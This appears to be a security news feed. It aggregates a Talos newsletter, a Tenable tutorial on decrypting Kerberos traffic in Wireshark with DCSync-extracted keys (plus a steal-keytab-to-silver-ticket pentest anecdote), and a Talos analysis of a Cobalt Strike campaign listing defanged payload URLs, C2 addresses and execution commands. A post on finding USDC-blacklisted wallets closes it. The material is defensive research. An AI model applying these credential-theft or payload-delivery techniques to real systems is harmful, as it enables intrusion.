🔒
There are new articles available, click to refresh the page.
Yesterday — 29 September 2022Vulnerabily Research

Threat Source newsletter (Sept. 29, 2022) — Attackers are already using student loan relief for scams

29 September 2022 at 18:00


By Jon Munshaw. 

Welcome to this week’s edition of the Threat Source newsletter. 

I’ve spent the past few months with my colleague Ashlee Benge looking at personal health apps’ privacy policies. We found several instances of apps that carry sensitive information stating they would share certain information with third-party advertisers and even law enforcement agencies, if necessary. 

One of the most popular period-tracking apps on the Google Play store, Period Calendar Period Tracker, has a privacy policy that states it will "share information with law enforcement agencies, public authorities, or other organizations if We’re [sic] required by law to do so or if such use is reasonably necessary. We will carefully review all such requests to ensure that they have a legitimate basis and are limited to data that law enforcement is authorized to access for specific investigative purposes only." 

A report from the Washington Post also released last week found that this app, as well as popular health sites like WebMD, “gave advertisers the information they’d need to market to people, or groups of consumers based on their health concerns.” 

To me — these were all things I had never considered before. I’m sure I’m not alone in just going to Google to type in “pain in left flank” or something along those lines to see if I’m dying or not. The research Ashlee and I did really make me rethink the type of information I’m inputting into apps on my phone, especially around my health. For example, I de-coupled the Google Fit tracking from my phone so it’s not just counting steps in the background. And I’ve switched to a privacy-focused browser on my personal computer at home (it doesn’t help that I’m also mad at Chrome for ending support for ad blockers).  

I’m actually mad at myself that it took me this long to think more critically about this topic. The research has always been out there. 

A 2018 study from Privacy International found that 61 percent of apps they tested immediately started sharing data with Facebook the instant a user opens the app  — this was at the peak of the discussion around the Cambridge Analytica/Facebook scandal. And the U.S. Federal Trade Commission filed a complaint against the Flo period-tracking app in January 2021 for misleading users about who it sends personal information to. 

We, collectively as a society, should have always been taking this issue more seriously. And the recent Supreme Court ruling in Dobbs v. Jackson Women's Health Organization is highlighting how personal data stored on apps could lead to legal consequences. The warning sides have always been there, but I think we were just too willing to trade in convenience in exchange for our privacy, thinking many of us have “nothing to hide.”  


The one big thing 


Insider threats are becoming an increasingly common part of the attack chain, with malicious insiders and unwitting assets playing key roles in incidents over the past year. This is becoming an increasing challenge for companies that now have remote workers all over the globe, many of whom may never come back to the office again. And if one of these employees leaves, it could leave some major security gaps. Over the past six months to a year, Talos has seen an increasing number of incident response engagements involving malicious insiders and unwitting assets being compromised via social engineering. 

Why do I care? 

Insider threats are different than “traditional” cyber attacks we think of because it’s not about a threat actor sitting in an entirely different country lobing malicious code at a network. It usually involves trying to socially engineer someone into unwittingly letting their guard down and providing access to a malicious user or giving up sensitive information in exchange for some money. This can seriously happen to anyone anywhere, increasingly so in the era of hybrid work. 

So now what?

Defending against these types of insider threats is difficult for a variety of reasons, but first and foremost, they typically are allowed to access the network and have valid login credentials. This is where traditional security controls like user and access control come into play. Organizations should limit the amount of access a user has to the minimum required for them to perform their job. 

 

Top security headlines from the week


Ukraine is warning that Russian state-sponsored actors are still targeting critical infrastructure with cyber attacks. The campaigns would likely be to “increase the effect of missile strikes on electrical supply facilities,” the Ukrainian government said. The warning also stated that the actors would also target Baltic states and Ukrainian allies with distributed denial-of-service attacks. Meanwhile, the U.S. continues to invest money into Ukraine’s cyber defenses and volunteer hackers continue to pitch in across the globe. (CyberScoop, Voice of America

U.K. police arrested a teenager allegedly involved in the recent Rockstar data breach, which included leaked information regarding the upcoming “Grand Theft Auto VI” video game. The suspect may have ties to the Lapsus$ ransomware group and have some involvement in another data breach against the Uber rideshare company. Lapsus$’s recent activities are vastly different from what APTs’ traditional goals are, usually related to making money somehow, instead opting to just seemingly want to cause chaos of the sake of it. These two major breaches highlight the fact that many major organizations have unaddressed vulnerabilities. (TechCrunch, Wired

A disgruntled developer leaked the encryptor behind the LockBit 3.0 ransomware, the latest in a line of drama with the group. The builder works and could allow anyone to build their own ransomware. The Bl00Dy ransomware gang has already started to use the leaked builder in attacks against companies. Bl00Dy has been operating since May 2022, first targeting medical and dental offices in New York. In the past, the group has also used leaked code from Babuk and Conti to build their ransomware payloads. They also claim to have a Tor channel they use to post leaks from affected companies if they do not pay the ransom. (The Record, Bleeping Computer


Can’t get enough Talos? 

Upcoming events where you can find Talos 


Virtual 

GovWare 2022 (Oct. 18 - 20)
Sands Expo & Convention Centre, Singapore 

Most prevalent malware files from Talos telemetry over the past week  


SHA 256: e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
MD5: 93fefc3e88ffb78abb36365fa5cf857c  
Typical Filename: Wextract  
Claimed Product: Internet Explorer  
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg  

MD5: 2c8ea737a232fd03ab80db672d50a17a     
Typical Filename: LwssPlayer.scr     
Claimed Product: 梦想之巅幻灯播放器     
Detection Name: Auto.125E12.241442.in02 

MD5: 10f1561457242973e0fed724eec92f8c   
Typical Filename: ntuser.vbe   
Claimed Product: N/A    
Detection Name: Auto.1A234656F8.211848.in07.Talos 

MD5: 8a5f8ed00adbdfb1ab8a2bb8016aafc1   
Typical Filename: RunFallGuys.exe 
Claimed Product: N/A 
Detection Name: W32.Auto:c326d1.in03.Talos 

MD5: 147c7241371d840787f388e202f4fdc1 
Typical Filename: EKSPLORASI.EXE 
Claimed Product: N/A  
Detection Name: Win32.Generic.497796 

Apple CoreText - An Unexpected Journey to Learn about Failure

29 September 2022 at 00:00
Late last year, I have focused my research on the CoreText framework for 2-3 months. In particular, the code related to the text shaping engine and the code responsible for parsing the AAT tables. During this research, I found an OOB (Out-Of-Bounds) Write in the morx table. This series of writeups is to document my whole process, from selecting this attack surface to finding the bug to writing an exploit for it in Safari.

Step-by-Step Walkthrough of CVE-2022-32792 - WebKit B3ReduceStrength Out-of-Bounds Write

8 September 2022 at 00:00
Recently, ZDI released the advisory for a Safari out-of-bounds write vulnerability exploited by Manfred Paul (@_manfp) in Pwn2Own. We decided to take a look at the patch and try to exploit it. The patch is rather simple: it creates a new function (IntRange::sExt) that is used to decide the integer range after applying a sign extension operation (in rangeFor). Before this patch, the program assumes that the range stays the same after applying sign extension.
Before yesterdayVulnerabily Research

Decrypt “encrypted stub data” in Wireshark

I often use Wireshark to analyze Windows and Active Directory network protocols, especially those juicy RPC 😉 But I’m often interrupted in my enthusiasm by the payload dissected as “encrypted stub data”:

Can we decrypt this “encrypted stub data?” 🤔

The answer is: yes, we can! 💪 We can also decrypt Kerberos exchanges, TGTs and service tickets, etc! And same for NTLM, as I will show you near the end.

Wait, is that magic?

Wireshark is very powerful, as we know, but how can it decrypt data? Actually there’s no magic required because we’ll just give it the keys it needs.

The key depends on the chosen algorithm (RC4, AES128, AES256…) during the Kerberos exchange, and they derive from the password (this is simplified but you didn’t come here to read the Kerberos RFC, right? 🤓).

My preferred method to get the Kerberos keys is to use mimikatz DCSync for the target user:

You’ll directly notice the AES256, AES128, and DES keys at the bottom, but what about the RC4 key? As you may have guessed, it’s simply the NT hash 😉

Just remember that modern Windows environments will likely use AES256 so that’s what we’ll target.

Keep tabs on the keys

Kerberos keys are commonly stored in “keytab” files, especially on Linux systems. By the way, if you find a keytab during a pentest, don’t forget to extract its keys because you’ll be able to create a silver ticket against the service, as I once did (see below ️⬇️️), or access other services with this identity.

Clément Notin on Twitter: "#Pentest success story:1. Steal .keytab file from a Linux server for a webapp using Kerberos authentication🕵️2. Extract Kerberos service encryption key using https://t.co/itX7S337o03. Create silver ticket using #mimikatz🥝 and pass-the-ticket4. Browse the target5. Profit!😉 pic.twitter.com/yI9yfoXDrb / Twitter"

Pentest success story:1. Steal .keytab file from a Linux server for a webapp using Kerberos authentication🕵️2. Extract Kerberos service encryption key using https://t.co/itX7S337o03. Create silver ticket using #mimikatz🥝 and pass-the-ticket4. Browse the target5. Profit!😉 pic.twitter.com/yI9yfoXDrb

So it’s no surprise that Wireshark expects its keys in a keytab too. It’s a binary format which can contain several keys, for different encryption algorithms, and potentially for different users.

Wireshark wiki describes how to create the keytab file, using various tools like ktutil. But the one I found the most convenient is keytab.py, by Dirk-jan @_dirkjan Mollema, who wrote it to decrypt Kerberos in his research on Active Directory forest trusts. I especially like that it doesn’t ask for the cleartext password, just the raw keys, contrary to most other tools.

First, download keytab.py (you don’t even need the entire repo). Additionally, install impacket if you have not already done so.

Then, open the script and edit lines 112 to 118 and add all the keys you have (in hexadecimal format) with the number corresponding to their type. For example, as we said, most of the time AES256 is used, corresponding to type 18.

The more keys you have, the better 🎉 If you are hesitant, you can even include the RC4 and AES256 keys for the same user. As Dirk-jan comments in the code, you can include the “krbtgt” key, “user” keys (belonging to the client user), “service” keys (belonging to the service user), and even “trust” keys (if you want to decrypt referral tickets in inter-realm Kerberos authentications). You can also add “computer account” keys to decrypt machines’ Kerberos communications (machine accounts in AD are users after all! Just don’t forget the dollar at the end when requesting their keys with DCSync). You don’t need to worry about the corresponding username or domain name in the keytab; it doesn’t matter for Wireshark.

Finally, run the script and pass the output filename as argument:

$ python keytab.py keytab.kt

Back to Wireshark

Configuration

Now that you have the keytab, open the Wireshark Preferences window, and under Protocols, look for “KRB5”.

Check “Try to decrypt Kerberos blobs” and Browse to the location of the keytab file you just generated.

Decrypt Kerberos

Now you can try opening some Kerberos exchanges. Everything that is properly decrypted will be highlighted in light blue. Here are a couple examples:

AS-REQ with the decrypted timestamp
AS-REP with the decrypted PAC (containing the user’s privileges, see [MS-PAC])
TGS-REP with its two parts, including the service ticket, both containing the same session key

⚠️ If you notice parts highlighted in yellow it means that the decryption failed. Perhaps the corresponding key is missing in the keytab, or its value for the selected algorithm was not provided (check the “etype” field to see which algorithm is used). For example:

👩‍🎓 Surprise test about Kerberos theory: can you guess whose key I provided here, and whose key is missing?

Answer: We observe that Wireshark can decrypt the first part which is the TGT encrypted with the KDC key, but it cannot decrypt the second part which is encrypted with the client’s key. Therefore, here the keytab only contains the krbtgt key.

Decrypt other protocols

Do you remember how this all began? I wanted to decrypt RPC payloads, not the Kerberos protocol itself!

And… it works too! 💥

Quick reminder first, the same color rule applies: blue means that decryption is ok, and yellow means errors. If you see some yellow during the authentication phase of the protocol (here the Bind step) the rest will certainly cannot be decrypted:

Here are some examples where it works, notice how the “encrypted stub data” is now replaced with “decrypted stub data” 🏆

It also works with other protocols, like LDAP:

workstation checking if its LAPS password is expired, and thus due for renewal

Additional tips

A modified keytab file does not take effect immediately in Wireshark. Either you have to open the Preferences, disable Kerberos decryption, confirm, then re-open it to re-enable it, which is slow and annoying… Or the fastest I’ve found is to save the capture, close Wireshark and re-open the capture file.

What about NTLM? Can we do the same decryption if NTLM authentication is used? The answer is yes! 🙂

In the Preferences, scroll to the “NTLMSSP” protocol, and type the cleartext password in the “NT Password” field. This is described in the Wireshark NTLMSSP wiki page where I have added some examples. Some limitations contrary to Kerberos: you need the cleartext password and it must be ASCII only (this limitation is mentioned in the source code) so it is not applicable to machine account passwords, and you can only provide one at a time, contrary to the keytab which can hold keys for several users.

Conclusion

I hope these tips will help you in your journey to examine “encrypted stub data” payloads using Wireshark. This is something that we often do at Tenable when doing research on Active Directory, and I hope it will benefit you too!

Protocols become increasingly encrypted by default, which is a very good thing… Therefore, packet capture analysis, without decryption capabilities, will become less and less useful, and I’m thankful to see those tools including such features. Do you know other protocols that Wireshark can decrypt? Or perhaps with other tools?


Decrypt “encrypted stub data” in Wireshark was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

New campaign uses government, union-themed lures to deliver Cobalt Strike beacons

28 September 2022 at 12:12
By Chetan Raghuprasad and Vanja Svajcer.
  • Cisco Talos discovered a malicious campaign in August 2022 delivering Cobalt Strike beacons that could be used in later, follow-on attacks.
  • Lure themes in the phishing documents in this campaign are related to the job details of a government organization in the United States and a trade union in New Zealand.
  • The attack involves a multistage and modular infection chain with fileless, malicious scripts.

Cisco Talos recently discovered a malicious campaign with a modularised attack technique to deliver Cobalt Strike beacons on infected endpoints.

The initial vector of this attack is a phishing email with a malicious Microsoft Word document attachment containing an exploit that attempts to exploit the vulnerability CVE-2017-0199, a remote code execution issue in Microsoft Office. If a victim opens the maldoc, it downloads a malicious Word document template hosted on an attacker-controlled Bitbucket repository.

Talos discovered two attack methodologies employed by the attacker in this campaign: One in which the downloaded DOTM template executes an embedded malicious Visual Basic script, which leads to the generation and execution of other obfuscated VB and PowerShell scripts and another that involves the malicious VB downloading and running a Windows executable that executes malicious PowerShell commands to download and implant the payload.

The payload discovered is a leaked version of a Cobalt Strike beacon. The beacon configuration contains commands to perform targeted process injection of arbitrary binaries and has a high reputation domain configured, exhibiting the redirection technique to masquerade the beacon's traffic.

Although the payload discovered in this campaign is a Cobalt Strike beacon, Talos also observed usage of the Redline information-stealer and Amadey botnet executables as payloads.

This campaign is a typical example of a threat actor using the technique of generating and executing malicious scripts in the victim's system memory. Defenders should implement behavioral protection capabilities in the organization's defense to effectively protect them against fileless threats.

Organizations should be constantly vigilant on the Cobalt Strike beacons and implement layered defense capabilities to thwart the attacker's attempts in the earlier stage of the attack's infection chain.

Initial vector

The initial infection email is themed to entice the recipient to review the attached Word document and provide some of their personal information.

Initial malicious email message.

The maldocs have lures containing text related to the collection of personally identifiable information (PII) which is used to determine the eligibility of the job applicant for employment with U.S. federal government contractors and their alleged enrollment status in the government's life insurance program.

The text in the maldoc resembles the contents of a declaration form of the U.S. Office of Personnel Management (OPM) which serves as the chief human resources agency and personnel policy manager for the U.S. federal government.

Contents of maldoc sample 1.

Another maldoc of the same campaign contains a job description advertising for roles related to delegating development, PSA plus — a prominent New Zealand trade union — and administrative support for National Secretaries at the Public Service Association office based out of Wellington, New Zealand. The contents of this maldoc lure resemble the legitimate job description documents for the New Zealand Public Service Association, another workers' union for New Zealand federal employees, headquartered in Wellington.

Contents of maldoc sample 2.

PSA New Zealand released this legitimate job description document in April 2022. The threat actor constructed the maldoc to contain the text lures to make it appear as a legitimate document on May 6, 2022. Talos' observation shows that the threat actors are also regular consumers of online news.

Attack methodologies

Attack methodologies employed by the actor in this campaign are highly modularised and have multiple stages in the infection chain.

Talos discovered two different attack methodologies of this campaign with a few variations in the TTPs', while the initial infection vector, use of remote template injection technique and the final payload remained the same.

Method 1

This is a modularised method with multiple stages in the infection chain to implant a Cobalt Strike beacon, as outlined below:

Summary of attack method 1 infection chain.

Stage 1 maldoc: DOTM template

The malicious Word document contains an embedded URL, https[://]bitbucket[.]org/atlasover/atlassiancore/downloads/EmmaJardi.dotm, within its relationship component "word/_rels/settings.xml.rels". When a victim opens the document, the malicious DOTM file is downloaded.

Contents of settings.xml.rels of maldoc.

Stage 2: VBA dropper

The downloaded DOTM executes the malicious Visual Basic for Applications (VBA) macro. The VBA dropper code contains an encoded data blob which is decoded and written into an HTA file, "example.hta," in the user profile local application temporary folder. The decoded content written to an HTA file is the next VB script, which is executed using the ShellExecuted method.

Stage 2 VBA dropper.

Stage 3 VB script

The third-stage VBS structure is similar to that of the stage 2 VB dropper. An array of the encoded data will be decoded to a PowerShell script, which is generated in the victim's system memory and executed.

Stage 3 VB script.

Stage 4 PowerShell script

The PowerShell dropper script executed in the victim's system memory contains an AES-encrypted data blob as a base64-encoded string and another base64-encoded string of a decryption key. The encoded strings are converted to generate the AES encrypted data block and the 256-bit AES decryption key. Using the decryption key, the encrypted data generates a PowerShell downloader script, which is executed using the PowerShell IEX function.

Stage 4 PowerShell script.

Stage 5 PowerShell downloader

The PowerShell downloader script is obfuscated and contains encoded blocks that are decoded to generate the download URL, file execution path and file extensions.

The following actions are performed by the script upon its execution in victim's system memory:

  1. The script downloads the payload from the actor controlled remote location through the URL "https[://]bitbucket[.]org/atlasover/atlassiancore/downloads/newmodeler.dll" to the user profile local application temporary folder.
  2. The script performs a check on the file extension of the downloaded payload file.
  3. If the payload has the extension .dll, the script will run the DLL using rundll32.exe exhibiting the use of sideloading technique.
  4. If the payload has an MSI file extension, the payload is executed using the command
    "msiexec /quiet /i <payload>".
  5. If the payload is an EXE file, then it will run it as a process using the PowerShell commandlet
    Start-Process.
  6. Upon running the payload, the script will hide the payload file to establish persistence by setting the "hidden" file system attribute of the payload file.

During our analysis, we discovered that the downloaded payload is a Cobalt Strike DLL beacon.

Stage 5 PowerShell downloader.

Method 2

The second attack method of this campaign is also modular, but is using less sophisticated Visual Basic and PowerShell scripts. We spotted that, in the attack chain, the actor employed a 64-bit Windows executable downloader which executes the PowerShell commands responsible for downloading and running the Cobalt Strike payload.

Summary of attack method 2 infection chain.

Stage 1 maldoc: DOTM template

When a victim opens the malicious document, Windows attempts to download a malicious remote DOTM template through the URL "https[://]bitbucket[.]org/clouchfair/oneproject/downloads/ww.dotm," which was embedded in its relationship component of the file settings.xml.rels."

Contents of settings.xml.rels of maldoc.

Stage 2 VB script

The DOTM template contains a VBA macro that executes a function to decode an encoded data block of the macro to generate the PowerShell downloader script and execute it with the shell function.

Stage 2 VB script.

Stage 3 PowerShell downloader

The PowerShell downloader command downloads a 64-bit Windows executable and runs it as a process in the victim's machine.

Stage 3 PowerShell downloader.

Stage 4 downloader executable

The downloader is a 64-bit executable that runs as a process in the victim's environment. It executes the PowerShell command, which downloads the Cobalt Strike payload DLL through the URL "https[://]bitbucket[.]org/clouchfair/oneproject/downloads/strymon.png" to the userprofile local application temporary directory with a spoofed extension .png and sideloads the DLL using rundll32.exe.

Stage 4 downloader EXE.

The downloader also executes the ping command to the IP address 1[.]1[.]1[.]1 and executes the delete command to delete itself. The usage of ping command is to instill a delay before deleting the downloader.

Payload

Talos discovered that the final payload of this campaign is a Cobalt Strike beacon. Cobalt Strike is a modularised attack framework and is customizable. Threat actors can add or remove features according to their malicious intentions. Employing Cobalt Strike beacons in the attacks' infection chain allows the attackers to blend their malicious traffic with legitimate traffic and evade network detections. Also, with its capabilities to configure commands in the beacon configuration, the attacker can perform various malicious operations such as injecting other malicious binary into the running processes of the infected machines and can avoid having a separate injection module implants in their infection chain.

The Cobalt Strike beacon configurations of this campaign showed us various characteristics of the beacon binary:
  • C2 server.
  • Communication protocols.
  • Process injection techniques.
  • Malleable C2 Instructions.
  • Target process to spawn for x86 and x64 processes.
  • Watermark : "Xi54kA==".
Cobalt Strike beacon configuration sample.

The Cobalt Strike beacon used in this campaign has the following capabilities:
  • Executes arbitrary codes in the target processes through process injection. Target processes described in the beacon configuration related to this campaign include:
  x86:
    "%windir%\syswow64\dns-sd.exe"
    "%windir%\syswow64\rundll32.exe"
    "%windir%\syswow64\dllhost.exe -o enable"

  x64:
    "%windir%\sysnative\getmac.exe /V"
    "%windir%\sysnative\rundll32.exe"
    "%windir%\sysnative\DeviceParingWizard.exe"

  • A high-reputation domain defined in the HostHeader component of the beacon configuration. The actor is using this redirector technique to make the beacon traffic appear legitimate and avoid detection.

Malicious repository

The attacker in this campaign has hosted malicious DOTM templates and Cobalt Strike DLLs on Bitbucket using different accounts. We spotted two attacker-controlled accounts "atlasover" and "clouchfair" in this campaign: https[://]bitbucket[.]org/atlasover/atlassiancore/downloads and https[://]bitbucket[.]org/clouchfair/oneproject/downloads.

During our analysis, the account "atlasover" was live and showed us the hosting information of some of the malicious files in this campaign.

Attacker-controlled bitbucket repository.

Talos also discovered in VirusTotal that the attacker operated the Bitbucket account "clouchfair," using the account to host two other information stealer executables, Redline and Amadey, along with a malicious DOTM template and Cobalt Strike DLL.

Command and control

Talos discovered the C2 server operated in this campaign with the IP address 185[.]225[.]73[.]238 running on Ubuntu Linux version 18.04, located in the Netherlands and is a part of the Alibaba cloud infrastructure.

Shodan search results showed us that the C2 server contained two self-signed SSL certificates with the serial numbers 6532815796879806872 and 1657766544761773100, which are valid from July 14, 2022 - July 14, 2023.

SSL certificate associated with the C2 servers.



Pivoting on the SSL certificates disclosed another Cobalt Strike C2 server with the IP address 43[.]154[.]175[.]230 running on Ubuntu Linux version 18.04 located in Hong Kong, which is also part of Alibaba cloud infrastructure and more likely is operated by the same actor of this campaign.

Coverage

Ways our customers can detect and block this threat are listed below.
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort Rule 60600 is available for this threat.

The following ClamAV signatures have been released to detect this threat:
Win.Packed.Generic-9956955-0
Win.Malware.CobaltStrike-9968593-1
Win.Dropper.AgentTesla-9969002-0
Win.Dropper.Swisyn-9969191-0
Win.Trojan.Swisyn-9969193-0
Win.Malware.RedlineStealer-9970633-0

IOC

The IOC list is available in Talos' Github repo here.


How Circle Banned Tornado Cash Users

28 September 2022 at 09:00

Tornado Cash is an open-source, decentralised cryptocurrency mixer. Using zero-knowledge proofs, this mixes identifiable funds with others, obscuring the original source of the funds. On 08 August 2022, the U.S. Office of Foreign Assets Control (OFAC) banned the Tornado Cash mixer, arguing that it had played a central role in the laundering of more than $7 billion.

The USD Coin (USDC) is a centralised digital currency that can be used for online payments. The issuer of the USDCs – the Circle company – guarantees that every digital coin is fully backed by actual U.S. dollars, with the value of one USDC pegged to an actual U.S. dollar. Following the ban, the Circle company started to freeze addresses linked with the Tornado Cash mixer.

This article does not aim to address any political views or opinions but rather to present an interesting case study on how this was technically achieved. We can seize this opportunity to investigate several basic but key concepts of Ethereum and Ethereum-based blockchains. For simplicity, in this article we will primarily focus on Ethereum.

Understanding ERC-20 Tokens

With Ethereum, tokens are handled by smart contracts – simple and short programmes stored on the blockchain that can be called via transactions. The smart contract is then responsible among other things for handling users’ transactions or storing owners’ balances.

A standard ABI (Application Binary Interface) for manipulating tokens called ERC-20 (Ethereum Request for Comments 20) was released to ease interoperability, and is described in the Ethereum Improvement Proposals (EIP) 20. The USDC follows that standard.

ERC-20 specifications are fairly short. To be a valid ERC-20 token, the deployed smart contract must simply implement the following functions:

  • totalSupply()
  • balanceOf(account)
  • allowance(owner, spender)
  • approve(spender, amount)
  • transfer(recipient, amount)
  • transferFrom(sender, recipient, amount)

It must also implement the following events:

  • Transfer(from, to, value)
  • Approval(owner, spender, value)

The USDC token

To understand how the USDC was implemented we only need the smart contract address and its source code, published by Circle:

There is a subtlety here but we will not go into detail. The source code for the real ERC-20 API for USDC can be retrieved from a proxy contract, which can be found at the following address:

You can check OpenZeppelin’s Unstructured Storage proxy pattern for more information. In short, using a proxy contract is a convenient way to manage upgrades.

The totalSupply() function

The totalSupply() function is pretty much self-explanatory and can be used at any time to find out how many tokens were minted in total.

Open Etherscan and search for the USDC contract address. Go to the “Contract” tab next to “Transactions”, “Internal Txns” and “Erc20 Token Txns”. Then click on the “Read as Proxy” button and scroll down the list to “totalSupply”.

At the time of writing, this was 42039807469599550 and with the decimal 42,039,807,469.599550 USDC. ERC-20 tokens can freely implement a decimals() function which is set to 6 here. Because we only “read” from the blockchain, these operations are free.

The transfer() Function

In order to send an ERC-20 token to another address, one would need to send a transaction to the transfer() function with the recipient address and the number of tokens to send as arguments. To make things easier we will only discuss here how a transaction is sent to a full Ethereum node and skip the part where it is actually added to the blockchain.

Let us examine how the transfer() function was implemented. The released code is written in Solidity. This is mostly straightforward, and not necessary to know in order to understand the following.

You can see notBlacklisted(msg.sender) and notBlacklisted(to) on lines 867 and 868. These are function modifiers, similar to Python’s decorators, and they wrap the function underneath.

The source code of the modifier is quite explicit. In Solidity, require() is a control function in which the initial parameter must be set to true, otherwise the transaction is reverted. Here the _account address is checked against the blacklisted mapping which is simply a hash table. It can be accessed with a key, i.e. the address, and it returns a value. If the address is not in the mapping, 0 is returned.

The value msg.sender is the address issuing the transaction, and to is the recipient. If none of these addresses are found in the blacklisted mapping, the _transfer() function is called and the transaction is enabled.

The blacklisted mapping is filled using the blacklist function.

Similarly, the onlyBlacklister() modifier protects unauthorised blacklisting of addresses.

TransferFrom() and Approve() functions

The transferFrom() function is very similar to the transfer() function and is mostly used by smart contracts to transfer tokens on your behalf. In theory it is possible to send tokens directly to a smart contract using transfer() and then call the desired function. However, this requires two transactions and the smart contract would have no idea about the first one.

The solution is to grant a smart contract access to transfer a limited or unlimited amount of tokens. This is achieved using the approve() function.

Following approval, the transferFrom() function can be called.

Both functions are of course covered by the notBlacklisted() modifier.

How to check whether an address is blacklisted

Now that we understand how Circle can block token transfers, we can play with the smart contract to determine whether an address is banned. For the demo we will use Vitalik’s, one of the Ethereum’s founders, wallet address.

The smart contract exports a function called isBlacklisted; all we need to do is to call it with the desired address.

Below is a small TypeScript piece of code that does exactly that:

import "dotenv/config";
import { ethers } from "ethers";

const USDC_PROXY_ADDRESS = "0xB7277a6e95992041568D9391D09d0122023778A2";
const VITALIK_WALLET = "0xAb5801a7D398351b8bE11C439e05C5B3259aeC9B";

const isBlacklisted = async (
   usdcContract: ethers.Contract,
   address: string
) => {
   const ret = await usdcContract.isBlacklisted(address);
   console.log(`Wallet ${address} is ${ret ? "" : "not"} blacklisted.`);
};

const main = async () => {
   const provider = new ethers.providers.JsonRpcProvider(
      process.env.HTTPS_ENDPOINT
   );

   const usdcContract = new ethers.Contract(
      USDC_PROXY_ADDRESS,
      ["function isBlacklisted(address _account) view returns (bool)"],
      provider
   );

   await isBlacklisted(usdcContract, VITALIK_WALLET);
};

Full code is available here.

$ ts-node src/isblacklisted.ts
Wallet 0xAb5801a7D398351b8bE11C439e05C5B3259aeC9B is not blacklisted.

Vitalik’s wallet is safe!

Or we could simply ask Etherscan again.

How to find all blacklisted addresses

We know how to check whether a single address was banned, but how can we retrieve all blacklisted addresses? Unfortunately for us, transactions are not indexed in the Ethereum blockchain and it is not possible to simply list the content of the mapping.

An important point here! Mapping cannot be used to store any secret. Anyone with a copy of the blockchain can retrieve all transaction data.

One way would be to go through every block and transaction and then dissect them to find transactions to the blacklist() function. However, this would be quite inefficient and extremely slow. Fortunately, Circle implemented an event that is issued every time an address is banned. And unlike transactions, events are indexed.

If we check the blacklist() function code, we can see the event on the last line.

The _account argument is also indexed.

To access logs, we can use the RPC method eth_getLogs() of an Ethereum node. This method accepts a few parameters:

  • fromBlock and toBlock
  • a contract address
  • and an array called topics

Topics are indexed parameters of an event, and they can be viewed as filters. The first topic, topic[0] is always the event signature, a keccak256 hash of the event name and parameters. This is easily computed using the ethers.js library.

ethers.utils.id("Blacklisted(address)");

The hash in our case is:

  • 0xffa4e6181777692565cf28528fc88fd1516ea86b56da075235fa575af6a4b855

The other topics are the arguments. For Blacklisted() it is an address. Since we want to find all events, this argument is left empty.

Even with an event filter, searching for the entire blockchain would take too long as there have been too many transactions since the genesis block. In this example we will only list Blacklisted() events that happened on the day of the ban, on 08 August 2022.

  • 2022-08-08 00:00
    • block number: 15298283
  • 2022-08-08 23:59
    • block number: 15304705
const filter = {
   address: USDC_ERC20_ADDRESS,
   fromBlock: 15298283,
   toBlock: 15304705,
   topics: [ethers.utils.id("Blacklisted(address)")],
};

Using ethers.js, we can call the getLogs() method using our filter.

const logs = await this.provider.getLogs(filter);

/* Sorting unique addresses. */
this.addresses = [
   ...(new Set() <
   string >
   logs.map((log) =>
      ethers.utils.getAddress(`0x${log.topics[1].substr(26)}`)
   )),
];

All we need to do now is to display the wallet addresses and frozen balances:

const symbol = await this.usdcContract.symbol();
console.log(`[+] ${this.addresses.length} wallets address found:`);

await Promise.all(
   this.addresses.map(async (address) => {
      const amount = await this.usdcContract.balanceOf(address);
      console.log(
         ` - ${address}: ${ethers.utils.formatUnits(amount, "mwei")} ${symbol}`
      );
   })
);

Running the script from the terminal gives us all the wallets that were banned that day.

> ts-node src/findbanned.ts
[+] 38 wallets address found:
- 0x8589427373D6D84E98730D7795D8f6f8731FDA16: 0.0 USDC
- 0xd90e2f925DA726b50C4Ed8D0Fb90Ad053324F31b: 0.0 USDC
- 0xDD4c48C0B24039969fC16D1cdF626eaB821d3384: 149.752 USDC
- 0xD4B88Df4D29F5CedD6857912842cff3b20C8Cfa3: 0.0 USDC
- 0x722122dF12D4e14e13Ac3b6895a86e84145b6967: 0.0 USDC
- 0xFD8610d20aA15b7B2E3Be39B396a1bC3516c7144: 0.0 USDC
- 0xF60dD140cFf0706bAE9Cd734Ac3ae76AD9eBC32A: 0.0 USDC
- 0xd96f2B1c14Db8458374d9Aca76E26c3D18364307: 3900.0 USDC
- 0x910Cbd523D972eb0a6f4cAe4618aD62622b39DbF: 0.0 USDC
- 0x4736dCf1b7A3d580672CcE6E7c65cd5cc9cFBa9D: 71000.0 USDC
- 0xb1C8094B234DcE6e03f10a5b673c1d8C69739A00: 0.0 USDC
- 0xA160cdAB225685dA1d56aa342Ad8841c3b53f291: 0.0 USDC
- 0xBA214C1c1928a32Bffe790263E38B4Af9bFCD659: 0.0 USDC
- 0x22aaA7720ddd5388A3c0A3333430953C68f1849b: 0.0 USDC

[...]

- 0x2717c5e28cf931547B621a5dddb772Ab6A35B701: 0.0 USDC
- 0x178169B423a011fff22B9e3F3abeA13414dDD0F1: 0.0 USDC

As mentioned previously, full code is available here.

Conclusion

Crypto assets are of a new kind of asset and a blooming technology. Understanding how Circle banned Tornado Cash users was a good excuse to understand key concepts and to explore the Ethereum blockchain. However we have only scratched the surface. Other assets may have different implementations, restrictions, different trade-offs. So always remember the famous principle: Don’t trust, verify!

